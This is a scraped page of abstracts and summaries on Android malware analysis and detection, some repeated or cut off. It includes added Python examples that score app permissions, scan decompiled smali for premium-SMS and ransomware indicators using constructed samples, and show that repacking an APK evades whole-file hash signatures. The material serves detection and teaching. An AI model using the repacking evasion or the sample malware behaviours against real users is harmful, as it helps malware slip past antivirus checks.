The document discusses analyzing Android malware. It describes setting up a lab with an Android SDK virtual machine. Tools for static and dynamic analysis are outlined. The document then demonstrates analyzing a malware sample that sends SMS messages to a premium rate number: extracting the APK, decompiling the code, and identifying the malicious behavior. By reversing the malware, the author recovered the premium number and the message text it sends, and was then able to modify, re-test and control the sample (the "I haz you" of the talk's title).
The document summarizes Trend Micro's 2012 Mobile Threat and Security Roundup. It found that in 2012 there was a significant increase in detected Android malware, reaching 350,000 samples by year's end. Premium service abusers that charge users fraudulent fees were the most common mobile threat. The document also notes that threats are increasing in sophistication, with cybercriminals developing new methods of attacking users beyond traditional social engineering. As Android grows in popularity, it faces similar threats to what Windows faced as the dominant desktop platform.
Android Malware: Study and analysis of malware for privacy leak in ad-hoc net... (IOSR Journals)
This document discusses analyzing Android malware that can leak privacy information in ad-hoc networks. It proposes using static and dynamic analysis methods to detect malware. In static analysis, reverse engineering is used to detect malicious code by decompiling Android app install files. In dynamic analysis, apps are run in an emulator to monitor their network behavior using tools like Snort. Destinations are then white-listed or blacklisted based on safety. The approach is compared to third party apps and is shown to also be effective at detecting malware that uses internet permissions to leak privacy data in small datasets.
Harsimran Walia presents information on analyzing Android malware. He discusses how the Android platform has become very popular for attackers due to its large market share and less restrictive development environment compared to iOS. He outlines different types of Android malware like data stealers and rooting malware. The paper also provides details on setting up a malware analysis lab and introduces both static and dynamic analysis tools. It then demonstrates the analysis process on a real premium SMS sending malware sample, showing how to decompile, modify, and test the malware.
ANDROID UNTRUSTED DETECTION WITH PERMISSION BASED SCORING ANALYSIS (ijitcs)
The Android smartphone is one of the fastest-growing mobile phones, and because of this it is one of the most preferred targets of malware developers. Malware apps can penetrate the device and gain privileges with which they can perform malicious activities such as reading user contacts, misusing private information such as by sending SMS, and harming the user by exploiting the private data stored on the device. The study is about the implementation of detecting untrusted Android applications, which would be the basis of all future development regarding malware detection.
Smartphone users worldwide are not aware that permissions are the basis of all malicious activities that could possibly operate in an Android system and steal personal and private information. The Android operating system is an open system in which users are allowed to install applications from any unsafe site. However, the permission mechanism of the Android system is not enough to guarantee the invulnerability of an application that can harm the user. In this paper, the permission scoring-based analysis scrutinizes the installed permissions and allows users to increase the efficiency of Android permissions by informing them about the risk of an installed Android application; the paper presents a framework that classifies the level of sensitivity of the permissions accessed by the application. The framework uses a formula that calculates the sensitivity level of the permissions and determines whether the installed application is untrusted or not. Our results show that, on a collection of 26 untrusted applications, the framework is able to correctly and consistently determine the applications' behavior.
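The abstract describes a formula that scores the sensitivity of requested permissions and flags an app as untrusted above some level. The following is an added illustration of that kind of scoring, not the paper's own framework or dataset: the per-permission weights, the combination bonuses, the threshold of 10 and the two sample manifests are all assumptions chosen for the example. It reads `<uses-permission>` entries from a decoded AndroidManifest.xml (as produced by apktool), sums weights, adds extra points for pairings such as a data source plus a network channel, and returns a verdict with the contributors listed so an analyst can see why.

```python
"""Permission-sensitivity scoring for an Android app.

Added illustration, not the paper's code: weights, combination bonuses,
threshold and the sample manifests are assumptions for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Assumed sensitivity weight per permission (higher = more dangerous).
# Anything not listed contributes 0.
PERMISSION_WEIGHTS = {
    "android.permission.SEND_SMS": 5,
    "android.permission.RECEIVE_SMS": 4,
    "android.permission.READ_SMS": 4,
    "android.permission.READ_CONTACTS": 3,
    "android.permission.ACCESS_FINE_LOCATION": 3,
    "android.permission.RECORD_AUDIO": 3,
    "android.permission.SYSTEM_ALERT_WINDOW": 3,
    "android.permission.READ_PHONE_STATE": 2,
    "android.permission.RECEIVE_BOOT_COMPLETED": 1,
    "android.permission.INTERNET": 1,
}

# Assumed pairings that are worse together than apart: a sensitive data
# source next to an exfiltration channel, or SMS sending that survives a
# reboot. Each entry is (set of permissions, extra points).
DANGEROUS_COMBINATIONS = [
    ({"android.permission.READ_CONTACTS", "android.permission.INTERNET"}, 3),
    ({"android.permission.READ_SMS", "android.permission.INTERNET"}, 4),
    ({"android.permission.SEND_SMS", "android.permission.RECEIVE_BOOT_COMPLETED"}, 3),
]

UNTRUSTED_THRESHOLD = 10  # assumed cut-off for the "untrusted" verdict

USES_PERMISSION_RE = re.compile(r'<uses-permission\s+android:name="([^"]+)"')


@dataclass
class RiskReport:
    score: int = 0
    untrusted: bool = False
    contributors: list[str] = field(default_factory=list)


def extract_permissions(manifest_xml: str) -> set[str]:
    """Collect <uses-permission> names from a decoded AndroidManifest.xml.
    Binary (compiled) manifests must be decoded first, e.g. with apktool."""
    return set(USES_PERMISSION_RE.findall(manifest_xml))


def score_permissions(perms: set[str]) -> RiskReport:
    """Sum the weights of the requested permissions, add pairing bonuses,
    and compare the total against the threshold."""
    report = RiskReport()
    for perm in sorted(perms):
        weight = PERMISSION_WEIGHTS.get(perm, 0)
        if weight:
            report.score += weight
            report.contributors.append(f"{perm.rsplit('.', 1)[-1]}(+{weight})")
    for combo, bonus in DANGEROUS_COMBINATIONS:
        if combo <= perms:
            names = "+".join(sorted(p.rsplit(".", 1)[-1] for p in combo))
            report.score += bonus
            report.contributors.append(f"{names}(+{bonus})")
    report.untrusted = report.score >= UNTRUSTED_THRESHOLD
    return report


def assess_manifest(manifest_xml: str) -> RiskReport:
    return score_permissions(extract_permissions(manifest_xml))


# Constructed manifests for the demonstration (not real apps).
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.weather">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
</manifest>"""

SMS_TROJAN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.freegame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
</manifest>"""

if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN_MANIFEST), ("sms-trojan", SMS_TROJAN_MANIFEST)):
        report = assess_manifest(manifest)
        verdict = "UNTRUSTED" if report.untrusted else "ok"
        print(f"{label}: score={report.score} {verdict} {' '.join(report.contributors)}")
```

The pairing bonuses are what make the scheme more useful than a plain sum: INTERNET on its own is harmless, but next to READ_CONTACTS it is an exfiltration path. The scheme still only sees declared permissions, so an app that obtains the same capability through an exported component of another app, or that requests dangerous permissions at runtime, will be under-scored; the code analysis that the other summaries on this page describe is the necessary complement.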
IRJET- A Survey on Android Ransomware and its Detection Methods (IRJET Journal)
This document summarizes methods for detecting Android ransomware through static, dynamic, and hybrid analysis approaches. Static analysis involves analyzing an Android app's code and resources without executing it. Some key static analysis techniques discussed are permission analysis, text analysis to search for ransomware keywords, and code analysis to check for encryption or screen locking behavior. Dynamic analysis executes the app and monitors its runtime behavior. Hybrid analysis combines both static and dynamic techniques. The document outlines several studies that have proposed and evaluated different static, dynamic, and hybrid analysis methods for detecting Android ransomware.
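Two of the items above rest on the same static technique: the c0c0n talk decompiles a premium-SMS sender to find the number and message it sends, and the ransomware survey lists keyword search, encryption calls and screen-locking APIs as static indicators. The following added example, which is not code from either document, runs an indicator table over decompiled smali. The indicator list and the three smali snippets are constructed for the example; real samples obfuscate strings and class names, so hits are leads for the analyst, not verdicts.

```python
"""Indicator-based static triage of decompiled Android code (smali).

Added example; indicator table and smali snippets are constructed.
"""
import re
from collections import defaultdict

# (category, regex matched against each smali line, meaning of a hit)
INDICATORS = [
    ("sms", r"Landroid/telephony/(?:gsm/)?SmsManager;->sendTextMessage", "sends SMS via SmsManager"),
    ("sms", r'const-string [vp]\d+, "\+?\d{4,6}"', "hard-coded short code"),
    ("crypto", r"Ljavax/crypto/Cipher;->getInstance", "instantiates a cipher"),
    ("crypto", r"Ljavax/crypto/Cipher;->doFinal", "encrypts/decrypts a buffer"),
    ("crypto", r"Ljava/io/File;->listFiles", "enumerates files on storage"),
    ("lock", r"Landroid/app/admin/DevicePolicyManager;->(?:lockNow|resetPassword)", "locks screen / changes PIN via device admin"),
    ("lock", r"Landroid/view/WindowManager;->addView", "draws an overlay window"),
    ("note", r'const-string [vp]\d+, ".*(?:your files|decrypt|bitcoin|ransom|unlock).*"', "ransom-note wording"),
]
COMPILED = [(cat, re.compile(pat, re.IGNORECASE), desc) for cat, pat, desc in INDICATORS]
SHORT_CODE_RE = re.compile(r'const-string [vp]\d+, "(\+?\d{4,6})"')


def triage(smali_lines):
    """Return {category: [(line_no, meaning, line), ...]} for every hit."""
    hits = defaultdict(list)
    for n, line in enumerate(smali_lines, 1):
        for cat, rx, desc in COMPILED:
            if rx.search(line):
                hits[cat].append((n, desc, line.strip()))
    return dict(hits)


def hard_coded_numbers(smali_lines):
    """Destination numbers a premium-SMS sample would text."""
    numbers = []
    for line in smali_lines:
        m = SHORT_CODE_RE.search(line)
        if m:
            numbers.append(m.group(1))
    return numbers


def classify(hits):
    """Require corroborating evidence before naming a behaviour, so a lone
    Cipher call (normal in a password vault) does not flag an app."""
    verdicts = []
    sms_meanings = {desc for _, desc, _ in hits.get("sms", [])}
    if {"sends SMS via SmsManager", "hard-coded short code"} <= sms_meanings:
        verdicts.append("premium-SMS sender")
    if "crypto" in hits and ("note" in hits or "lock" in hits):
        verdicts.append("crypto-ransomware")
    elif "lock" in hits and "note" in hits:
        verdicts.append("locker-ransomware")
    return verdicts


# Constructed smali, shaped like baksmali output but not from a real sample.
PREMIUM_SMS_SMALI = """\
.method public onReceive(Landroid/content/Context;Landroid/content/Intent;)V
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v0
    const-string v1, "3353"
    const/4 v2, 0x0
    const-string v3, "GOLD"
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    return-void
.end method
"""

RANSOMWARE_SMALI = """\
.method private encryptAll(Ljava/io/File;)V
    invoke-virtual {p1}, Ljava/io/File;->listFiles()[Ljava/io/File;
    move-result-object v0
    const-string v1, "AES/CBC/PKCS5Padding"
    invoke-static {v1}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;
    move-result-object v2
    invoke-virtual {v2, v3}, Ljavax/crypto/Cipher;->doFinal([B)[B
    const-string v4, "Your files are encrypted. Send 0.5 Bitcoin to decrypt."
    invoke-virtual {v5}, Landroid/app/admin/DevicePolicyManager;->lockNow()V
    return-void
.end method
"""

BENIGN_SMALI = """\
.method private openVault([B)V
    const-string v0, "AES/GCM/NoPadding"
    invoke-static {v0}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;
    move-result-object v1
    invoke-virtual {v1, p1}, Ljavax/crypto/Cipher;->doFinal([B)[B
    return-void
.end method
"""

if __name__ == "__main__":
    for name, src in (("premium-sms", PREMIUM_SMS_SMALI), ("ransomware", RANSOMWARE_SMALI), ("vault", BENIGN_SMALI)):
        lines = src.splitlines()
        hits = triage(lines)
        print(f"{name}: {classify(hits) or ['no verdict']} numbers={hard_coded_numbers(lines)}")
        for cat, entries in hits.items():
            for n, desc, _ in entries:
                print(f"  [{cat}] line {n}: {desc}")
```

Recovering the short code and message text this way is what lets an analyst confirm the premium-rate behaviour without running the sample; in practice the strings are frequently built at runtime or pulled from a server, in which case the dynamic analysis step (emulator plus SMS and network monitoring) is what yields them.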
"I haz you and pwn your maal" by Harsimran Walia @b44nz0r at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
Review on mobile threats and detection techniques (ijdpsjournal)
Since the last decade, smart-phones have gained widespread usage. Mobile devices store personal details such as contacts and text messages. Due to this extensive growth, smart-phones have become attractive to cyber-criminals. In this research work, we have done a systematic review of the terms related to malware detection algorithms and have also summarized the behavioral description of some known mobile malwares in tabular form. After careful solicitation of all the possible methods and algorithms for detection of mobile-based malwares, we give some recommendations for designing future malware detection algorithms by considering computational complexity and detection ratio of mobile malwares.
Tech Report: On the Effectiveness of Malware Protection on Android (Fraunhofer AISEC)
This document evaluates the effectiveness of malware protection on Android devices. It conducts tests on several Android antivirus apps using known malware samples and a newly developed proof of concept malware. The tests find that most antivirus apps can be easily evaded by making only trivial alterations to malware package files. The document aims to provide a more realistic assessment of the malware risk and the level of protection offered by antivirus software compared to traditional antivirus tests.
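The report's finding that trivial alterations to the package file defeat most products comes down to what the product actually matches on. The following added example, not from the report, builds two minimal APK-style archives in memory that differ only by an extra asset file and shows that a signature over the whole package hash misses the variant while a signature over the unchanged classes.dex still matches. The entry names and contents are constructed placeholders, not a real sample.

```python
"""Why repacking beats whole-file hash signatures.

Added example (not from the Fraunhofer report); archive contents are
constructed placeholders.
"""
import hashlib
import io
import zipfile


def build_package(entries: dict) -> bytes:
    """Write entries into an APK-style ZIP and return the bytes. Sorted
    names and zipfile's fixed default timestamp keep the output deterministic."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name in sorted(entries):
            zf.writestr(name, entries[name])
    return buf.getvalue()


def package_hash(apk: bytes) -> str:
    """Signature style 1: SHA-256 of the whole file, as a hash blacklist uses."""
    return hashlib.sha256(apk).hexdigest()


def dex_hash(apk: bytes) -> str:
    """Signature style 2: SHA-256 of classes.dex alone, ignoring other entries."""
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        return hashlib.sha256(zf.read("classes.dex")).hexdigest()


def is_known_malware(apk: bytes, blacklist: set, signature) -> bool:
    return signature(apk) in blacklist


# Constructed "malware" package; the dex bytes stand in for real bytecode.
ORIGINAL = {
    "AndroidManifest.xml": b"<manifest package='com.example.premiumsms'/>",
    "classes.dex": b"dex\n035\x00" + b"sendTextMessage 3353 GOLD" * 4,
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
}
# Trivial alteration: identical code, one extra asset file dropped in.
REPACKED = dict(ORIGINAL, **{"assets/readme.txt": b"nothing to see here\n"})


def demo() -> dict:
    original = build_package(ORIGINAL)
    variant = build_package(REPACKED)
    blacklist_whole = {package_hash(original)}
    blacklist_dex = {dex_hash(original)}
    return {
        "whole_file_catches_variant": is_known_malware(variant, blacklist_whole, package_hash),
        "dex_catches_variant": is_known_malware(variant, blacklist_dex, dex_hash),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

The second signature survives this particular alteration only because the code entry was untouched; renaming a class or re-assembling the dex changes its bytes as well, which is why the report's conclusion points toward matching on behaviour or code structure rather than on any byte-exact hash.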
The document summarizes various cybersecurity incidents reported in July 2021. It covers ransomware attacks against Fujifilm in Japan and UnitingCare Queensland in Australia, data breaches affecting Alibaba and CVS Health, and Cisco vulnerabilities being exploited. New malware includes the DarkRadiation ransomware targeting Linux and the return of the Agent Tesla RAT in COVID-19 vaccine phishing scams. The gaming, technology, healthcare and government sectors were most affected. Attack vectors included ransomware, data leaks, malware/trojans and exploitation of known vulnerabilities; consequences involved encryption of systems and files, theft of personally identifiable information and system compromise.
Taxonomy mobile malware threats and detection techniques (csandit)
Since the last decade, smart-phones have gained widespread usage. Mobile devices store personal details such as contacts and text messages. Due to this extensive growth, smart-phones have become attractive to cyber-criminals. In this research work, we have done a systematic review of the terms related to malware detection algorithms and have also summarized the behavioral description of some known mobile malwares in tabular form. After careful solicitation of all the possible methods and algorithms for detection of mobile-based malwares, we give some recommendations for designing future malware detection algorithms by considering computational complexity and detection ratio of mobile malwares.
The document provides an overview of security testing techniques for mobile applications on various platforms including Android, BlackBerry, and iOS. It discusses topics such as application threat models, traffic analysis and manipulation, insecure data storage, reverse engineering application binaries, analyzing application components and runtime behavior. The goal is to identify vulnerabilities that could impact the confidentiality, integrity or availability of the mobile application or user data.
This document summarizes predictions for cyber threats in 2013 from McAfee Labs researchers. They predict:
- Mobile worms that buy malicious apps and steal payment info using NFC. Malware that blocks security updates on phones. Ransomware "kits" for mobile.
- Covert, persistent attacks targeting below the kernel of Windows. Rapid development of ways to attack the new Windows 8 and HTML5.
- Large-scale infrastructure attacks like Stuxnet. Highly targeted attacks using the Citadel Trojan to evade detection. Malware that reconnects after botnets are taken down.
The document discusses various threats facing iOS and Android mobile devices and point-of-sale systems. It describes attacks such as jailbreaking iOS devices to install surveillance apps, using stolen certificates to sideload malicious apps, exploiting Android vulnerabilities, and using WiFi man-in-the-middle attacks. It promotes BETTER Mobile Security's solution which continuously monitors devices for unauthorized activity and configuration changes to detect and prevent these advanced threats in real-time.
Comilion aims to create the first crowd-sourcing platform for mobile app vulnerability assessment and dynamic app permission management. The founders have extensive experience in cyber security and IT management. Comilion's technology will offer app risk evaluation and recommendations to help secure private and work data on devices in BYOD environments. The company is seeking $1M to launch consumer and enterprise products and establish partnerships with mobile device management providers.
This document discusses mobile malware and how to protect against it. It begins by defining malware and listing common types. It then provides statistics on the distribution of mobile operating systems and malware detections. The document outlines sources of mobile malware infections and discusses why mobile devices contain sensitive information. It recommends implementing mobile device management to centrally manage devices and deploy security policies. Examples of recent mobile threats are also described. The document concludes by recommending security best practices like using antivirus software, updating devices, and educating users.
TrendLabs 2012 Annual Security Roundup: Evolved Threats in a “Post-PC” World (Infinigate Group)
In 2012, cybercriminals increasingly targeted mobile devices like Android smartphones and embraced new platforms beyond PCs. The number of Android malware grew explosively to over 350,000, mirroring the growth of the Android OS. Data breaches and targeted attacks continued at an alarming rate, with the cost of the Global Payments breach reaching $94 million. Cybercriminals also refined existing attack methods, with ransomware, automatic transfer systems, and the Blackhole Exploit Kit all becoming more sophisticated. While zero-day vulnerabilities still emerged, attackers also effectively exploited older vulnerabilities since many systems remained unpatched.
The document contains summaries of several security news articles. The articles discuss issues like vulnerabilities in iPhone fingerprint authentication and signed Mac malware, flaws in Verizon femtocells allowing eavesdropping, a remote access tool targeting Android devices, and vulnerabilities in a Ukrainian bank's mobile app allowing account theft. The document also mentions several upcoming security events in India.
“Design and Detection of Mobile Botnet Attacks” (iosrjce)
A mobile botnet is a type of bot that runs automatically once installed on a mobile phone that does not have any anti-malware. The botnet gains complete access over the mobile device. The common propagation media for smartphone-based botnet attacks are SMS, Bluetooth and Wi-Fi. In our project, we will demonstrate an SMS-cum-Wi-Fi based mobile botnet using a centralized C&C server. The botmaster issues commands to the C&C server and the C&C propagates them to the infected smartphones, i.e. the bots. We will try to develop a network which cannot be detected easily and propagates fast. The target of the propagation will be the Android operating system. For detection, an application is created to detect whether a smartphone is working as a bot or not. In this, we guide the user about possible botnet attacks.
Mobile Threats and Trends Changing Mobile App Security (DevOps.com)
Deploying your high-value mobile app to untrusted environments such as consumer mobile devices can be a risky proposition. Are some of your customers’ devices compromised? Do your users also download apps from untrusted sources? Is there malware residing on their devices that target apps such as yours?
Despite your best efforts to code secure apps, assess their security posture, and remediate any identified vulnerabilities – it’s not quite enough in today’s mobile threat landscape. Safeguarding mobile apps during runtime and empowering them to protect themselves in hostile environments is becoming a necessity in the face of ever-evolving mobile attack tactics and techniques.
During this webinar, we will:
Discuss today’s mobile app threat landscape
Explain how changing distribution models (e.g., Fortnite for Android) affect your app’s security
Illustrate the potential financial impact of mobile threats on a business’s bottom line
Demonstrate mobile overlay and other attacks
Reveal how mobile apps can protect themselves against these attacks with app shielding and runtime protection
This document summarizes the design and detection of mobile botnet attacks. It begins by defining a mobile botnet and how they can gain access to mobile devices without anti-malware. It then discusses the history of mobile botnets and some of the challenges in designing effective SMS-based mobile botnets that can evade detection. The document proposes a SMS and WiFi based heterogeneous mobile botnet model using a centralized command and control server. It outlines the methodology for both designing the mobile botnet and detecting whether a smartphone is operating as a bot. Steps for designing and detecting the botnet are provided along with discussing the usefulness and concluding that more work is needed to track down botmasters and develop generalized guidelines.
Malware detection techniques for mobile devices (ijmnct)
Mobile devices have become very popular nowadays; due to their portability and high performance, a mobile device has become a must-have for persons using information and communication technologies. In addition to rapid hardware evolution, mobile applications are also increasing in complexity and performance to cover most of the needs of their users. Both software and hardware design have focused on increasing performance and the working hours of a mobile device. Different mobile operating systems are in use today, with different platforms and different market shares. Like all information systems, mobile systems are prone to malware attacks. Due to the personal nature of mobile devices, malware detection is very important and is a must-have tool on each device to protect private data and mitigate attacks. In this paper, we will study and analyze different malware detection techniques used for mobile operating systems. We will focus on the two competing mobile operating systems, Android and iOS. We will assess each technique, summarizing its advantages and disadvantages. The aim of the work is to establish a basis for developing a mobile malware detection tool based on user profiling.
Mobile application security testing is important to identify vulnerabilities and protect sensitive user data. The key concepts of mobile app security testing include authentication, authorization, availability, confidentiality, integrity and non-repudiation. Common mobile security threats include malware, spyware, privacy threats and vulnerable applications. Effective security testing employs strategies like strong authentication, encryption, access control and session management. The testing methodology involves profiling the app, analyzing threats, planning tests, executing tests, and providing daily status reports. Deliverables include management reports, technical vulnerability reports, and best practices documents.
This document provides an overview of mobile application security testing. It discusses the mobile security stack including the infrastructure, hardware, operating system and application layers. It then covers topics like mobile threat modeling, mobile application auditing techniques including dynamic and static analysis. The document also discusses the OWASP top 10 mobile risks and provides case studies and demonstrations on pentesting real mobile applications and reverse engineering Android malware.
This document provides an overview of 16 dynamic analysis platforms for analyzing Android applications and detecting malware. It evaluates these platforms' effectiveness using known malware samples and known Android bugs. The results show low diversity among platforms due to code reuse, making them vulnerable to evasion. Additionally, the platforms could be exploited by malware using the Master Key bugs to hide malicious behavior.
The document discusses security issues with Android applications. It notes that while Android was designed with security in mind through privilege separation for apps, applications are granted permissions upon installation that are not checked again, allowing potential misuse. This could allow bad actors to convince users to install apps that access private information. The document also notes that Android malware has increased significantly in recent years, with over 100,000 detected in 2012. It introduces Trend Micro's Mobile App Reputation service, which analyzes apps for malware, privacy risks, and performance issues to provide reputation scores and reports to app stores.
the personality feature of mobile devices, malware detection is very important and is a must tool in each device to protect private data and mitigate attacks. In
this paper, we will study and analyze different malware detection techniques used for mobile operating systems. We will focus on the to two competing mobile operating systems – Android and iOS. We will asset each technique summarizing its advantages and disadvantages. The aim of the work is to establish a basis for developing a mobile malware detection tool based on user profiling.
MALWARE DETECTION TECHNIQUES FOR MOBILE DEVICESijmnct
Mobile devices have become very popular nowadays, due to is portability and high performance, a mobile
device became a must device for persons using information and communication technologies. In addition to
hardware rapid evolution, mobile applications are also increasing in their complexity and performance to
cover most the needs of their users. Both software and hardware design focused on increasing performance
and the working hours of a mobile device. Different mobile operating systems are being used today with
different platforms and different market shares. Like all information systems, mobile systems are prone to
malware attacks. Due to the personality feature of mobile devices, malware detection is very important and
is a must tool in each device to protect private data and mitigate attacks. In this paper, we will study and
analyze different malware detection techniques used for mobile operating systems. We will focus on the to
two competing mobile operating systems – Android and iOS. We will asset each technique summarizing its
advantages and disadvantages. The aim of the work is to establish a basis for developing a mobile malware
detection tool based on user profiling.
Mobile application security testing is important to identify vulnerabilities and protect sensitive user data. The key concepts of mobile app security testing include authentication, authorization, availability, confidentiality, integrity and non-repudiation. Common mobile security threats include malware, spyware, privacy threats and vulnerable applications. Effective security testing employs strategies like strong authentication, encryption, access control and session management. The testing methodology involves profiling the app, analyzing threats, planning tests, executing tests, and providing daily status reports. Deliverables include management reports, technical vulnerability reports, and best practices documents.
This document provides an overview of mobile application security testing. It discusses the mobile security stack including the infrastructure, hardware, operating system and application layers. It then covers topics like mobile threat modeling, mobile application auditing techniques including dynamic and static analysis. The document also discusses the OWASP top 10 mobile risks and provides case studies and demonstrations on pentesting real mobile applications and reverse engineering Android malware.
This document provides an overview of 16 dynamic analysis platforms for analyzing Android applications and detecting malware. It evaluates these platforms' effectiveness using known malware samples and known Android bugs. The results show low diversity among platforms due to code reuse, making them vulnerable to evasion. Additionally, the platforms could be exploited by malware using the Master Key bugs to hide malicious behavior.
The document discusses security issues with Android applications. It notes that while Android was designed with security in mind through privilege separation for apps, applications are granted permissions upon installation that are not checked again, allowing potential misuse. This could allow bad actors to convince users to install apps that access private information. The document also notes that Android malware has increased significantly in recent years, with over 100,000 detected in 2012. It introduces Trend Micro's Mobile App Reputation service, which analyzes apps for malware, privacy risks, and performance issues to provide reputation scores and reports to app stores.
The document discusses malware detection and prevention techniques for smart devices. It begins with an introduction to the growing threat of malware targeting smart devices, especially Android devices. It then provides an overview of security models for various mobile operating systems. The document also covers malware analysis techniques, including static analysis of code and dynamic analysis of behaviors. It discusses signature-based and anomaly-based malware detection methods. Finally, it proposes combining static and dynamic analysis techniques into a hybrid analysis approach to improve malware detection.
The document discusses malware improvements on Android OS. It provides an introduction to the growth of smartphones and Android's dominance of the market. It then covers the organization of the paper and defines malware. It reviews the Android OS architecture and literature on Android security. The objectives are to increase awareness of the Android security model and analyze malware development. The findings show Android security relies on user awareness and the open source nature makes it vulnerable. Future scopes include modifying the permission model and alpha testing apps for the Play Store.
Android Malware Detection Literature ReviewAhmed Sabbah
This document provides an overview of Android malware detection approaches based on a literature review. It discusses static, dynamic, and hybrid analysis methods. Static methods examine app components and code without execution. Dynamic methods monitor running apps to log behaviors like API calls and network traffic. Hybrid approaches combine static and dynamic analysis. The document also outlines limitations like evasion techniques, lack of real device testing, and privacy concerns. It recommends future work in areas like improving machine learning models, detecting zero-day attacks, and preserving user privacy during dynamic analysis.
The document summarizes a research paper that studied detecting malicious Android applications in official and third-party Android app markets. The researchers developed a system called DroidRanger that uses permission-based filtering and behavioral analysis to detect both known and unknown malware. DroidRanger revealed 211 malicious apps total, with 32 from the official market and 179 from alternative markets. It also discovered a sophisticated zero-day malware with 40 samples, 11 of which were in the official market.
This document summarizes a review of behavior-based malware analysis for Android. It discusses existing stochastic epidemic models for malware detection that are complex. The proposed system abstracts program behaviors and compares them to reference malware behaviors to detect suspicious activities. It analyzes apps, represents them as trace languages abstracted according to behavior patterns, and detects malware by comparing to a malware database. The system gets installed apps, running tasks, extracts permission information, and detects malware to help users identify potentially malicious apps.
Android open-source operating System for mobile devicesIOSR Journals
This document provides an overview of the Android operating system and its security features. It discusses Android's architecture, including its use of the Linux kernel and Dalvik virtual machine. Key security aspects are summarized, such as the permission model and limitations of running apps within a sandbox. The document also introduces an exploit execution framework that can test Android devices for vulnerabilities. It concludes by discussing how malware may propagate on Android devices and potential future threats.
A Study on Modern Methods for Detecting Mobile MalwareIRJET Journal
This document discusses modern methods for detecting mobile malware. It begins by providing background on the growth of mobile malware attacks and outlines some common types of mobile malware like Trojans, banking trojans, backdoors, ransomware, hybrid malware, botnets, spyware, and cryptocurrency mining malware. It then compares the architectures of the Android and iOS operating systems. The document analyzes mobile malware and details various detection techniques, categorizing them as signature-based, behavior-based, permission-based, or hybrid techniques. It evaluates the effectiveness and usability of different research approaches for mobile malware detection.
A case study of malware detection and removal in android appsijmnct
With the proliferation of smart phone users, android malware variants is increasing in terms of numbers
and amount of new victim android apps. The traditional malware detection focuses on repackage,
obfuscate and/or other transformable executable code from malicious apps. This paper presented a case
study on existing android malware detection through a sequence of steps and well developed encoding SMS
message. Our result has demonstrated a solid testify of our approach in the effectiveness of malware
detection and removal.
HONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROIDIJCNCJournal
1. The document presents HoneypotLabsac, a virtual honeypot framework for Android that aims to learn more about targeted mobile device attacks.
2. The framework allows emulating services like telnet, HTTP, and SMS to collect log data from interactions without compromising the actual device.
3. HoneypotLabsac generates log files of all emulated service connections and SMS messages, stores them on the device, and sends them periodically to a log server for analysis.
Evaluating android antimalware against transformation attacksIAEME Publication
This document summarizes a study that evaluated the effectiveness of 10 popular commercial Android antimalware products against common malware transformation techniques. The researchers developed a framework called DroidChameleon that applied various obfuscation techniques to known malware samples to generate new variants. They found that none of the antimalware products were resistant to these basic transformations, and many could be trivially defeated. The researchers hope their findings will motivate the security community to improve current mobile malware detection capabilities.
Countering mobile malware in CSP’s network. Android honeypot as anti-fraud so...Denis Gorchakov
Honeypot is used for botnet analysis, traffic capturing and revealing C&C hostnames. It’s also used for detecting subscribers with infected devices and monitoring malware activities like funds withdrawal and remote control.
This document discusses a tool called ALTERDROID that analyzes Android applications to detect malware. ALTERDROID uses static and dynamic analysis techniques to detect obfuscated malware hidden in applications. It analyzes applications that are installed on a device to identify any malicious components. If malware is found, it asks the user for permission to uninstall the application. For unauthorized users attempting to access the device, it captures their image and sends it by email. The document compares this approach to existing static-only malware analysis techniques, which can miss hidden malicious components.
Mobile security is one of the most important
aspect when it comes to keeping our data secure from any
external attack like phishing, data hacking and many other
attacks that can have very disastrous effects that may also
lead to social disturbance, as in one’s private data can be
made public by the attackers.
IRJET - System to Identify and Define Security Threats to the users About The...IRJET Journal
The document describes a proposed system called "MobiSecure" that would identify and define security threats from illegitimate installed applications on Android devices. It aims to scan a device's memory for applications downloaded from unknown sources that could enable cyberattacks. The system would detect such applications, inform the user, and allow deleting the application to mitigate risks. It has modules for scanning devices, displaying results with threat descriptions, and removing flagged applications. The system architecture is designed to identify malware-containing applications installed without user knowledge to help decrease cyber threats.
MACHINE LEARNING APPROACH TO LEARN AND DETECT MALWARE IN ANDROIDIRJET Journal
This document discusses machine learning approaches for detecting malware in Android apps. It first classifies different types of malware like viruses, trojans, worms, spyware, adware, and ransomware. It then discusses important features for malware detection like n-grams, opcodes, strings, memory access, and API calls. The document reviews several papers on machine learning techniques for Android malware detection using methods like random forest, SVM, decision trees, and evaluating accuracy and efficiency. It proposes using ANN and SVM models to identify malicious and benign apps and providing a category-based machine learning approach to improve detection accuracy.
Top Mobile Application Penetration Testing Tools for Android and iOS.pdfElanusTechnologies
